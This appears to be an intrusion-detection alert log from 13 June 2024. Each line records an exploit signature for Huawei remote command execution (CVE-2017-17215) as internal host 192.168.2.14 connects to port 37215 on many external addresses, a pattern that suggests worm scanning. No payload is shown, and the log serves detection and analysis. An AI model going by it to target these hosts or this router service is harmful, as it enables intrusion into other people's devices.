                                                        06/13/24-21:32:50.610658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177437215192.168.2.14197.45.207.48
                                                        06/13/24-21:33:13.229462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056637215192.168.2.14197.234.250.195
                                                        06/13/24-21:33:09.130534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5294037215192.168.2.14156.154.72.148
                                                        06/13/24-21:32:40.355960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200637215192.168.2.14197.125.50.89
                                                        06/13/24-21:32:09.458971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6070237215192.168.2.14156.203.221.47
                                                        06/13/24-21:32:15.638386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3533637215192.168.2.14156.216.143.38
                                                        06/13/24-21:33:09.087928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361037215192.168.2.1441.160.166.136
                                                        06/13/24-21:32:01.222661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6072437215192.168.2.1441.224.22.165
                                                        06/13/24-21:32:11.485089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215037215192.168.2.1441.103.79.252
                                                        06/13/24-21:32:56.758716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372437215192.168.2.14197.93.114.139
                                                        06/13/24-21:32:01.223429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4989637215192.168.2.14156.10.72.236
                                                        06/13/24-21:32:48.556226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4028637215192.168.2.14156.234.212.174
                                                        06/13/24-21:32:52.660072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038237215192.168.2.1441.150.223.241
                                                        06/13/24-21:32:01.220493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4138237215192.168.2.14197.79.242.20
                                                        06/13/24-21:32:44.457767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935637215192.168.2.1441.7.21.234
                                                        06/13/24-21:32:21.784439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6054037215192.168.2.1441.73.157.28
                                                        06/13/24-21:33:04.987716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4902437215192.168.2.14197.31.115.252
                                                        06/13/24-21:32:15.634491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4632837215192.168.2.14197.252.194.104
                                                        06/13/24-21:32:42.408907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505037215192.168.2.1441.246.179.114
                                                        06/13/24-21:32:07.417658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291037215192.168.2.14197.13.225.114
                                                        06/13/24-21:32:25.972384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721837215192.168.2.1441.201.120.215
                                                        06/13/24-21:32:30.078725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734037215192.168.2.14197.16.186.173
                                                        06/13/24-21:33:07.056344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485637215192.168.2.1441.231.114.62
                                                        06/13/24-21:32:32.153391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3643637215192.168.2.1441.31.132.156
                                                        06/13/24-21:32:05.349409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3387037215192.168.2.1441.218.64.215
                                                        06/13/24-21:32:07.400845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408237215192.168.2.14156.15.5.165
                                                        06/13/24-21:32:48.549659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709637215192.168.2.1441.121.67.138
                                                        06/13/24-21:32:05.378607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5248037215192.168.2.14156.119.57.145
                                                        06/13/24-21:33:09.088773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882437215192.168.2.14156.134.5.202
                                                        06/13/24-21:32:01.220335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578637215192.168.2.14197.106.84.205
                                                        06/13/24-21:32:40.354923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6053037215192.168.2.14197.170.241.26
                                                        06/13/24-21:32:44.457360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6029837215192.168.2.1441.120.27.82
                                                        06/13/24-21:32:09.439685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5066037215192.168.2.1441.117.69.224
                                                        06/13/24-21:32:09.439282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940837215192.168.2.14156.26.150.99
                                                        06/13/24-21:32:52.657016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5049437215192.168.2.1441.12.46.91
                                                        06/13/24-21:32:03.295101TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5227237215192.168.2.14197.13.47.35
                                                        06/13/24-21:32:28.045655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5889437215192.168.2.14197.154.29.94
                                                        06/13/24-21:33:02.938121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690837215192.168.2.14197.8.85.40
                                                        06/13/24-21:32:17.678038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5617837215192.168.2.1441.181.42.41
                                                        06/13/24-21:32:50.632030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479037215192.168.2.14156.126.120.152
                                                        06/13/24-21:32:30.074446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521837215192.168.2.14156.187.124.28
                                                        06/13/24-21:32:13.546312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3912237215192.168.2.14156.107.9.169
                                                        06/13/24-21:32:32.169182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052037215192.168.2.14156.128.200.9
                                                        06/13/24-21:33:11.155169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5409437215192.168.2.14156.190.198.5
                                                        06/13/24-21:32:17.671189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737837215192.168.2.14156.63.137.143
                                                        06/13/24-21:33:11.177847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025437215192.168.2.1441.133.229.212
                                                        06/13/24-21:32:13.567220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429837215192.168.2.14197.242.229.124
                                                        06/13/24-21:32:46.508215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875637215192.168.2.14197.198.201.156
                                                        06/13/24-21:32:21.782610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079437215192.168.2.14156.120.86.104
                                                        06/13/24-21:32:28.027646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738237215192.168.2.1441.125.182.239
                                                        06/13/24-21:32:40.372050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616037215192.168.2.1441.255.127.186
                                                        06/13/24-21:32:36.243018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690637215192.168.2.1441.79.31.127
                                                        06/13/24-21:32:32.166626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5613437215192.168.2.14197.142.65.235
                                                        06/13/24-21:33:02.954199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895837215192.168.2.14156.90.190.39
                                                        06/13/24-21:31:57.092645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4122237215192.168.2.14197.27.187.97
                                                        06/13/24-21:32:54.724509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3564837215192.168.2.1441.115.79.149
                                                        06/13/24-21:31:57.093757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5213637215192.168.2.1441.200.53.47
                                                        06/13/24-21:32:40.357266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3444037215192.168.2.14156.20.104.55
                                                        06/13/24-21:32:50.614671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093637215192.168.2.14197.147.233.74
                                                        06/13/24-21:32:32.166086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3441037215192.168.2.1441.159.120.145
                                                        06/13/24-21:32:40.372674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5562637215192.168.2.1441.83.47.234
                                                        06/13/24-21:32:09.458730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4880237215192.168.2.1441.180.2.179
                                                        06/13/24-21:32:09.438859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5204437215192.168.2.14197.221.98.194
                                                        06/13/24-21:32:42.422823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981437215192.168.2.14156.129.159.43
                                                        06/13/24-21:32:36.245950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5590037215192.168.2.14156.235.177.231
                                                        06/13/24-21:32:38.323992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148437215192.168.2.1441.249.125.80
                                                        06/13/24-21:32:34.215337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4336637215192.168.2.14156.36.43.132
                                                        06/13/24-21:32:40.380261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3551437215192.168.2.14156.85.34.18
                                                        06/13/24-21:32:17.694615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050637215192.168.2.14197.14.24.242
                                                        06/13/24-21:32:30.075891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5190437215192.168.2.1441.181.157.215
                                                        06/13/24-21:32:17.675448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786637215192.168.2.1441.38.20.70
                                                        06/13/24-21:32:32.165451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958637215192.168.2.14197.200.94.55
                                                        06/13/24-21:32:46.508655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5231437215192.168.2.1441.237.116.22
                                                        06/13/24-21:32:54.709012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875237215192.168.2.14197.248.229.172
                                                        06/13/24-21:32:15.611164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3453037215192.168.2.1441.114.241.60
                                                        06/13/24-21:32:50.632595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694637215192.168.2.14156.58.61.39
                                                        06/13/24-21:32:52.656769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345437215192.168.2.14197.157.121.64
                                                        06/13/24-21:32:03.307530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4129237215192.168.2.1441.49.85.198
                                                        06/13/24-21:32:30.094686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582637215192.168.2.1441.31.147.94
                                                        06/13/24-21:32:38.316705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618637215192.168.2.1441.190.220.213
                                                        06/13/24-21:32:05.345770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4620437215192.168.2.1441.32.160.216
                                                        06/13/24-21:33:13.212865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3977837215192.168.2.14156.0.153.164
                                                        06/13/24-21:32:32.152146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3302237215192.168.2.1441.104.64.174
                                                        06/13/24-21:32:01.222633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105637215192.168.2.14197.107.126.192
                                                        06/13/24-21:32:54.724608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5350637215192.168.2.14156.217.123.103
                                                        06/13/24-21:32:07.404119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5414437215192.168.2.1441.52.187.220
                                                        06/13/24-21:32:56.786304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641037215192.168.2.14197.119.251.128
                                                        06/13/24-21:32:17.695022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452637215192.168.2.14156.106.245.169
                                                        06/13/24-21:32:54.707559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085037215192.168.2.14197.216.254.15
                                                        06/13/24-21:32:17.695846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658437215192.168.2.1441.79.196.214
                                                        06/13/24-21:33:11.180577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298837215192.168.2.14197.144.173.210
                                                        06/13/24-21:32:32.153539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4160037215192.168.2.14197.94.214.154
                                                        06/13/24-21:32:05.347035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243037215192.168.2.14197.145.192.245
                                                        06/13/24-21:32:46.503467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493437215192.168.2.14156.63.84.228
                                                        06/13/24-21:33:11.159874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770237215192.168.2.14156.19.130.239
                                                        06/13/24-21:32:40.359713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5116837215192.168.2.14197.177.101.170
                                                        06/13/24-21:32:36.248178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280437215192.168.2.14156.195.28.253
                                                        06/13/24-21:32:07.403863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028037215192.168.2.14156.190.162.220
                                                        06/13/24-21:32:32.164830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4049837215192.168.2.1441.101.241.119
                                                        06/13/24-21:32:30.096779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4974437215192.168.2.14156.153.212.84
                                                        06/13/24-21:32:25.991618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635037215192.168.2.14197.147.194.3
                                                        06/13/24-21:32:42.417793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437037215192.168.2.14156.142.163.104
                                                        06/13/24-21:32:32.156694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3980037215192.168.2.14156.96.115.33
                                                        06/13/24-21:32:56.755432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199237215192.168.2.14197.93.25.112
                                                        06/13/24-21:32:15.635102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5836437215192.168.2.14197.55.27.50
                                                        06/13/24-21:33:11.174005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469237215192.168.2.14156.108.117.11
                                                        06/13/24-21:31:59.196717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239637215192.168.2.1441.172.177.215
                                                        06/13/24-21:33:05.016512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542237215192.168.2.1441.181.120.128
                                                        06/13/24-21:32:07.416186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4138837215192.168.2.1441.58.95.158
                                                        06/13/24-21:32:28.028404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5845637215192.168.2.14197.86.36.98
                                                        06/13/24-21:32:15.629879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4503437215192.168.2.14156.193.115.203
                                                        06/13/24-21:32:42.405248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4069837215192.168.2.14197.229.220.252
                                                        06/13/24-21:33:09.129128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163837215192.168.2.14197.132.161.40
                                                        06/13/24-21:32:11.509070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5202037215192.168.2.14197.177.200.131
                                                        06/13/24-21:33:15.258729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5767037215192.168.2.14197.37.46.183
                                                        06/13/24-21:33:05.014054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164637215192.168.2.1441.18.230.106
                                                        06/13/24-21:31:57.091479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3664637215192.168.2.1441.98.170.196
                                                        06/13/24-21:32:50.612735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4066037215192.168.2.14197.227.3.63
                                                        06/13/24-21:32:44.458476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4335237215192.168.2.14197.164.24.116
                                                        06/13/24-21:32:01.239703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3790837215192.168.2.14156.60.152.170
                                                        06/13/24-21:32:09.440060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4319837215192.168.2.1441.212.131.7
                                                        06/13/24-21:32:23.835327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5661837215192.168.2.14156.207.183.78
                                                        06/13/24-21:32:05.348796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904437215192.168.2.14156.149.190.62
                                                        06/13/24-21:32:21.785150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3718837215192.168.2.14197.25.197.33
                                                        06/13/24-21:32:46.503936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934637215192.168.2.1441.72.68.78
                                                        06/13/24-21:32:17.675112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4007037215192.168.2.1441.221.156.234
                                                        06/13/24-21:32:44.454866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152637215192.168.2.14156.33.186.245
                                                        06/13/24-21:32:52.656299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5589837215192.168.2.1441.125.50.106
                                                        06/13/24-21:33:11.178809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791837215192.168.2.14156.245.120.213
                                                        06/13/24-21:33:00.885176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3910637215192.168.2.1441.175.191.23
                                                        06/13/24-21:32:19.730047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5925437215192.168.2.14156.49.29.42
                                                        06/13/24-21:33:17.307931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030437215192.168.2.14197.138.224.189
                                                        06/13/24-21:33:02.914294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5808837215192.168.2.14156.212.113.33
                                                        06/13/24-21:32:23.933127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4072437215192.168.2.1441.253.182.161
                                                        06/13/24-21:32:40.358659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859237215192.168.2.14156.200.195.17
                                                        06/13/24-21:32:48.550749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563637215192.168.2.1441.8.182.155
                                                        06/13/24-21:33:05.010761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118637215192.168.2.14197.154.23.100
                                                        06/13/24-21:32:07.403824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061237215192.168.2.1441.160.66.115
                                                        06/13/24-21:32:54.711338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4012237215192.168.2.14197.114.172.192
                                                        06/13/24-21:33:17.309570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763637215192.168.2.14197.136.135.155
                                                        06/13/24-21:32:36.248723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4266237215192.168.2.14156.86.87.178
                                                        06/13/24-21:32:40.377649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4352437215192.168.2.14197.245.214.102
                                                        06/13/24-21:32:52.657068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878237215192.168.2.14156.143.231.189
                                                        06/13/24-21:33:07.060154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5010437215192.168.2.14156.231.128.45
                                                        06/13/24-21:32:23.836097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5022037215192.168.2.14156.159.9.247
                                                        06/13/24-21:32:42.402872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553437215192.168.2.1441.82.59.201
                                                        06/13/24-21:32:54.711415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565437215192.168.2.14156.87.118.117
                                                        06/13/24-21:33:02.908207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5429237215192.168.2.14197.33.0.23
                                                        06/13/24-21:32:34.213465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093237215192.168.2.14197.175.152.153
                                                        06/13/24-21:32:17.672695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257437215192.168.2.14156.123.131.224
                                                        06/13/24-21:32:32.167893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3816237215192.168.2.14156.33.176.21
                                                        06/13/24-21:33:15.252329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6081837215192.168.2.1441.187.59.228
                                                        06/13/24-21:32:13.566778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125437215192.168.2.14156.135.156.221
                                                        06/13/24-21:32:28.026084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643237215192.168.2.1441.185.142.87
                                                        06/13/24-21:32:19.731282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688037215192.168.2.14156.12.50.62
                                                        06/13/24-21:32:28.023887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746037215192.168.2.14197.9.149.21
                                                        06/13/24-21:32:19.730855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601837215192.168.2.14156.60.66.161
                                                        06/13/24-21:32:19.749527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865237215192.168.2.1441.59.65.162
                                                        06/13/24-21:32:28.042505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4041037215192.168.2.14197.2.6.103
                                                        06/13/24-21:33:05.016881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292037215192.168.2.14197.129.172.130
                                                        06/13/24-21:32:23.834264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5966637215192.168.2.1441.133.122.188
                                                        06/13/24-21:32:03.278492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843237215192.168.2.14197.35.140.134
                                                        06/13/24-21:33:05.016215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291037215192.168.2.14197.53.222.143
                                                        06/13/24-21:33:07.057952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493037215192.168.2.14197.84.11.242
                                                        06/13/24-21:32:05.343699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5936037215192.168.2.14197.75.75.86
                                                        06/13/24-21:32:40.357520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654237215192.168.2.14156.216.99.130
                                                        06/13/24-21:32:17.696932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4864837215192.168.2.1441.133.251.251
                                                        06/13/24-21:32:17.678340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379237215192.168.2.1441.160.164.82
                                                        06/13/24-21:32:32.170579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5748237215192.168.2.1441.75.92.25
                                                        06/13/24-21:32:13.570448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478237215192.168.2.14156.190.223.5
                                                        06/13/24-21:32:58.823565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5088437215192.168.2.14197.101.93.123
                                                        06/13/24-21:33:15.254578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961637215192.168.2.14156.184.232.228
                                                        06/13/24-21:32:03.300265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753637215192.168.2.14197.0.87.171
                                                        06/13/24-21:32:36.244520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4796037215192.168.2.14197.184.52.238
                                                        06/13/24-21:32:36.268543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146037215192.168.2.1441.60.146.150
                                                        06/13/24-21:32:48.554494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026837215192.168.2.1441.116.234.33
                                                        06/13/24-21:33:09.107826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4885037215192.168.2.1441.240.14.28
                                                        06/13/24-21:33:15.255960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899237215192.168.2.14197.183.166.41
                                                        06/13/24-21:32:07.415752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784237215192.168.2.14197.253.110.40
                                                        06/13/24-21:32:21.800071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5379037215192.168.2.14156.13.122.116
                                                        06/13/24-21:32:32.164633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4279837215192.168.2.14197.63.77.22
                                                        06/13/24-21:32:28.024477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5842837215192.168.2.1441.162.174.143
                                                        06/13/24-21:33:04.987326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390837215192.168.2.14197.199.198.242
                                                        06/13/24-21:32:07.403912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6029837215192.168.2.14197.133.242.222
                                                        06/13/24-21:32:03.278728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131637215192.168.2.14156.178.110.31
                                                        06/13/24-21:33:13.214604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4382037215192.168.2.14156.61.65.67
